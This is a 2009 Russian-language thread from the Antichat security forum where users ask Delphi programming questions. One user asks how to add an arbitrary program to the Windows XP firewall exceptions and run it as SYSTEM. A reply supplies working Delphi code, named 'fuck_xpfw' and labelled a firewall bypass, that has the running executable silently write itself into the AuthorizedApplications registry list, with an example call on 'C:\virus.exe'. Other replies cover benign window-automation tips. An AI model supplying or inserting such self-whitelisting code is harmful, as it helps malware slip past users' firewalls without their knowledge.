ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
03.06.2009, 22:12
|
|
Познающий
Регистрация: 20.12.2008
Сообщений: 76
Провел на форуме:
432982
Репутация:
6
|
|
1)Как запустить чужую прогу от пользователя SYSTEM(в диспетчере так отображает)?
2)Как добавить чужую прогу в исключения стандартного виндового фаервола?
Читал что нужно в HKEY_LOCAL_MACHINE\System\ControlSet001\Services\S haredAccess\Parameters\FirewallPolicy\StandardProf ile\AuthorizedApplications\List добавить строковый параметр с именем - путь к программе и содержанием путь:*:Enabled:путь
Ну чтото неочень понятно, допустим есть прога которая лежить в C:\123.exe, тогда код в делфи будет выглядеть так:
Код:
procedure install(filename,about:string);
var
key:HKEY;
begin
RegOpenKeyEx(longword($80000002), 'HKEY_LOCAL_MACHINE\System\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProf ile\AuthorizedApplications\List ',0,$000F003F,Key);//Непонятно что обозначает
RegSetValueEx(Key, pchar(about), 0,1, pchar(filename), length(filename));//Что в этой строчке надо вписывать?
RegCloseKey(Key);
end;
Покажите пример с добавлением проги C:\123.exe в исключения фаера, с меня спасибка.
Последний раз редактировалось Maxxxtri23; 03.06.2009 в 22:35..
|
|
|
03.06.2009, 22:20
|
|
Познающий
Регистрация: 12.05.2009
Сообщений: 45
Провел на форуме:
255342
Репутация:
28
|
|
Приветствую
Как узнать имя класса поля в постороннем приложении?
к примеру делаю так:
Код:
var forma,pole: THandle;
begin
forma:=FindWindow(nil,'');
if forma<>0 then
begin
pole:=FindWindowEx(forma,0,nil,nil);
// а вот здесь вывести на экран класс pole-я
end;
end;
Общая задача состоит в том, чтоб пролистать все поля формы и узнать их классы... такое возможно? |
|
|
|
03.06.2009, 22:49
|
|
Постоянный
Регистрация: 05.05.2006
Сообщений: 743
Провел на форуме:
2982851
Репутация:
107
|
|
Пожалуйста подскажите как такое http://forum.antichat.ru/thread123498.html можно сделать
|
|
|
|
03.06.2009, 23:05
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.03.2007
Сообщений: 1,985
Провел на форуме:
3288241
Репутация:
3349
|
|
2 МongBa† - GetClassName
|
|
|
|
03.06.2009, 23:25
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.03.2007
Сообщений: 1,985
Провел на форуме:
3288241
Репутация:
3349
|
|
Максимум что ты можеш в паскале под дос - это только пропиликать внутренним динамиком. но звук воды врядли нормальный ты сможешь сделать из этого. Долго возиться и подбирать. Как вариант можно попробовать заюзать спец модули.
Когдато видел модуль для воспросизведения 8 килогерцовых WAV файлов в паскале через внутренний динамик.
|
|
|
|
03.06.2009, 23:25
|
|
Постоянный
Регистрация: 05.05.2006
Сообщений: 743
Провел на форуме:
2982851
Репутация:
107
|
|
ладно конкретизирую вопрос : как принудительно выгрузить драйвера BDE ?
|
|
|
|
03.06.2009, 23:52
|
|
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
Провел на форуме:
5749763
Репутация:
1680
|
|
Сообщение от Maxxxtri23
Код:
procedure install(filename,about:string);
var
key:HKEY;
begin
RegOpenKeyEx(longword($80000002), 'HKEY_LOCAL_MACHINE\System\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProf ile\AuthorizedApplications\List ',0,$000F003F,Key);//Непонятно что обозначает
RegSetValueEx(Key, pchar(about), 0,1, pchar(filename), length(filename));//Что в этой строчке надо вписывать?
RegCloseKey(Key);
end;
Это процедура, её редактировать не надо, а надо вызывать с параметрами, например:
install('C:\virus.exe','virusvalue');
Сообщение от Maxxxtri23
Покажите пример с добавлением проги C:\123.exe в исключения фаера, с меня спасибка.
// Обход виндового файрвола:
Код:
procedure fuck_xpfw;
var
key:HKEY;
ValueName:array[0..255] of char;
Value:string;
const
path='SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List';
begin
if RegOpenKeyEx($80000002, path, 0, LOngword($F003F), key)<>0 then exit;
GetModuleFileName(GetModuleHandle(nil), ValueName, 256);
Value:=ValueName+':*:Enabled:RPC';
RegSetValueEx(key, ValueName, 0, 1, pchar(Value), length(Value));
RegCloseKey(key);
end;
Вставляешь в свой код, далее даёшь команду например при создании формы:
Код:
procedure TForm1.FormCreate(Sender: Tlol);
begin
fuck_xpfw;
end;
|
|
|
|
04.06.2009, 04:00
|
|
Познающий
Регистрация: 12.05.2009
Сообщений: 45
Провел на форуме:
255342
Репутация:
28
|
|
Сообщение от slesh
2 МongBa† - GetClassName
Спасибо, разобрался...
и еще - после заполнения полей и нажатия на кнопку выскакивает еще одна форма для ввода данных по верх родительской, и код дальше не выполняется...
Код:
dia:=FindWindow(nil,'Формочко');
if dia<>0 then
begin
ip:=FindWindowEx(dia,0,'ComboBoxEx32',nil);
GetMem(P,16);
StrPLCopy(P,'127.0.0.1',16);
SendMessage(ip,WM_SETTEXT,0,cardinal(P));
FreeMem(P,16);
ip:=FindWindowEx(dia,0,'Button','OK');
SendMessage(ip,BM_CLICK,0,0);
// от здесь и останавливаемся
end;
Если реально продолжить выполнение - как вычислить хендл появившейся формы?
|
|
|
|
04.06.2009, 07:35
|
|
Познающий
Регистрация: 20.12.2008
Сообщений: 76
Провел на форуме:
432982
Репутация:
6
|
|
Nightmarе, спс работает, но дело в том, что на Висте х64 нет пути List (см скрин), а только ...FirewallPolicy\StandardProfile\AuthorizedApplic ations\ и если выбрать этот путь, то все норм, а если добавить еще list, то ничего не пишет, мб это отличие вистовского фаера от ХРшного? 1 вопрос с запуском программы как системной все еще в силе
Последний раз редактировалось Maxxxtri23; 04.06.2009 в 07:39..
|
|
|
|
04.06.2009, 09:34
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.03.2007
Сообщений: 1,985
Провел на форуме:
3288241
Репутация:
3349
|
|
2 МongBa†
1) нашел окно
2) нашел кнопку
3) кликнул на кнопку
4) сделал паучу 1/10 секунды чтобы окно прогрузилось
5) ищиш уже появившееся окно.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
